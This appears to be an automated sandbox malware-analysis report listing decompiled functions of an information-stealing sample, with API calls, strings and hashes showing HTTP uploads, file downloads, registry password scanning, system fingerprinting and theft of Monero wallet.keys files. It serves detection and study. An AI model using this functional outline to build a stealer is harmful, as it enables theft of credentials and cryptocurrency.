Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: 10f8d54376e3b5367ee62ddff68a19014b5296cf016c591a8fccde4daf0e2bb0
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,02F61B90), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,02F61BA0), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,02F61B60,?,02F66870,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

", xrefs: 004048B2
", xrefs: 004049F3
------, xrefs: 004047E8
J&f, xrefs: 004047A5
------, xrefs: 0040467D
------, xrefs: 00404929

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 9906fb4f6b3fd350b932ca2aec9f76456412fdc8bcd13fd916d3f7d5b5d7eb5b
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 9906fb4f6b3fd350b932ca2aec9f76456412fdc8bcd13fd916d3f7d5b5d7eb5b
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,02F63390,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: b8111693fa62a267de5ebd841b34ea72a3f35e1b955037dfc24ed0bdb14de6f5
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: b8111693fa62a267de5ebd841b34ea72a3f35e1b955037dfc24ed0bdb14de6f5
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 9f1b4f11eae13c0db4981184c1b5932fc42dca235854517f4c2e1cf032e699fe
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 9f1b4f11eae13c0db4981184c1b5932fc42dca235854517f4c2e1cf032e699fe
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Strings

.keys, xrefs: 0040132B
\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0
SOFTWARE\monero-project\monero-core, xrefs: 004012F5

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 829d047be8548394cdd0d92b89e8218dfaef052577727897bd9fcb70cd4860d9
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 829d047be8548394cdd0d92b89e8218dfaef052577727897bd9fcb70cd4860d9
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(2F6A5020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(2F6A5020,00000000), ref: 00407018
lstrcat.KERNEL32(2F6A5020, : ), ref: 0040702A
lstrcat.KERNEL32(2F6A5020,00000000), ref: 0040705F
lstrcat.KERNEL32(2F6A5020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(2F6A5020,00000000), ref: 004070A3
lstrcat.KERNEL32(2F6A5020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

: , xrefs: 0040701E
h0A, xrefs: 00406FA6, 00406FA9
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: fad620bb43c95ac72e570f87520ac694cccd13f49ee7692c54244a2421b88b9f
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: fad620bb43c95ac72e570f87520ac694cccd13f49ee7692c54244a2421b88b9f
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: df4b5375de85740f6df385f3b25298f6dd913adec2cf3b48f6988f7d2f499267
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: df4b5375de85740f6df385f3b25298f6dd913adec2cf3b48f6988f7d2f499267
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74
c.A, xrefs: 00404CC1, 00404DA0

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: ca588432d9c45ec4d266bad531f4ca137aab267bd9607120867c66fabd43db69
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: ca588432d9c45ec4d266bad531f4ca137aab267bd9607120867c66fabd43db69
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

\, xrefs: 004141FD
C, xrefs: 004141E9
:, xrefs: 004141F9

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 0a1b2232d35ee7de4b6f28c15393aae813b3accf682f5c3251ca908f42bab15a
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 0a1b2232d35ee7de4b6f28c15393aae813b3accf682f5c3251ca908f42bab15a
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 00409426, 00409449, 00409429, 0040946F
'@, xrefs: 004093C3, 00409486

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: cf458a8a353809de38654f8e72a6455ab1764ae5e341fa98badb5250dcb4c73b
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: cf458a8a353809de38654f8e72a6455ab1764ae5e341fa98badb5250dcb4c73b
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02F65518,00000000,?,0041D774,00000000,?,00000000,00000000,?,02F65560), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,02F61B90), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 1228ebacb78d31f25c277ea55be27c99626425af329256098e025d0f3d603cf5
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 1228ebacb78d31f25c277ea55be27c99626425af329256098e025d0f3d603cf5
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 289973c41d267e15cc15f44ba20e5b83e962fce2ffd0ae7a3877ef2d23b008d0
